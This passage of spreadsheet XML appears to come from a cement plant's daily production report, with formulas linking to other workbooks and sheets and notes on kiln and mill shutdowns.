      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]26'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]26'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]26'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]26'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]26'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]26'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]26'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]26'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]26'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]26'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]26'!$E$16</f>
        <v>2635</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'25'!H41</f>
        <v>17838</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>142814</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]26'!$I$16</f>
        <v>679.51</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'25'!K41</f>
        <v>22693.66</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>144087.2</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]26'!$L$16</f>
        <v>21274.1</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>70.9136666666667</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]26'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]26'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]26'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'25'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]26'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'25'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]26'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]26'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]26'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'25'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]26'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'25'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]26'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]26'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]26'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]26'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'25'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]26'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'25'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]26'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]26'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]26'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'25'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]26'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'25'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]26'!$L$14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'[12]26'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'25'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]26'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'25'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]26'!$L$15</f>
        <v>53774.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]26'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]26'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]26'!$R$29</f>
        <v>689.86</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'25'!U44</f>
        <v>6474.66</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>71227.828</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]26'!$V$29</f>
        <v>207</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'25'!X44</f>
        <v>4701</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>71111</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]26'!$Y$29</f>
        <v>4073.117</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]26'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'25'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]26'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'25'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]26'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]26'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]26'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]26'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]26'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]26'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]26'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]26'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]26'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'25'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'25'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]26'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]26'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]26'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'25'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]26'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'25'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]26'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'25'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'25'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]26'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]26'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]26'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'25'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]26'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'25'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]26'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'25'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'25'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]26'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]26'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]26'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'25'!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]26'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'25'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]26'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'25'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'25'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]26'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]26'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]26'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'25'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]26'!$V$8</f>
        <v>742.3</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'25'!X49</f>
        <v>4217.4089</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>180747.7489</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]26'!$Y$8</f>
        <v>6376.21610000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'25'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'25'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]26'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]26'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]26'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'25'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]26'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'25'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]26'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]26'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]26'!$E$24</f>
        <v>6824</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'25'!H51</f>
        <v>107689.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1484088.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]26'!$I$24</f>
        <v>4188.9</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'25'!K51</f>
        <v>124662.567</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1487786.498</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]26'!$L$24</f>
        <v>31726.1169999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>70.5024822222218</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]26'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]26'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]26'!$R$30</f>
        <v>770.63</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'25'!U51</f>
        <v>5035.2</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>68033.671</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]26'!$V$30</f>
        <v>284</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'25'!X51</f>
        <v>4540.788</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>65157.025</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]26'!$Y$30</f>
        <v>3745.78600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]26'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]26'!$E$19</f>
        <v>5760.11000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'25'!H52</f>
        <v>30850.3800000005</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1414417.63</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]26'!$I$19</f>
        <v>6317.463</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'25'!K52</f>
        <v>100106.373</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1381800.573</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]26'!$L$19</f>
        <v>35790.4500000507</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>24.6830689655522</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'[13]26'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]26'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'25'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]26'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'25'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]26'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]26'!$M$21+'[14]26'!$M$22+'[14]26'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]26'!$N$21+'[14]26'!$N$22+'[14]26'!$N$35</f>
        <v>42.85</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'25'!U53</f>
        <v>1054.56</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39388.987</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]26'!$Q$21+'[14]26'!$Q$22+'[14]26'!$Q$35</f>
        <v>34</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'25'!X53</f>
        <v>843</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40334</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]26'!$T$21+'[14]26'!$T$22+'[14]26'!$T$35</f>
        <v>1860.507</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]26'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'25'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]26'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'25'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]26'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]26'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]26'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]26'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'25'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]26'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'25'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]26'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]26'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'25'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]26'!$I$63</f>
        <v>1323.463</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'25'!K55</f>
        <v>8401.388</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>43837.038</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]26'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]26'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]26'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]26'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]26'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]26'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]26'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]26'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]26'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'25'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'25'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]26'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：0:00-22:10续停；2#磨：续停；3#磨：8:00-23:00避峰停机；4#磨：8:00-22:20避峰停机。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G57+'25'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'25'!K57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G58+'25'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'25'!K58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G59+'25'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'25'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]26'!$Q$65</f>
        <v>窑:错峰续停。A组磨：0:00-24:00续停。D1#磨：正常，D2#磨：正常。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G60+'25'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
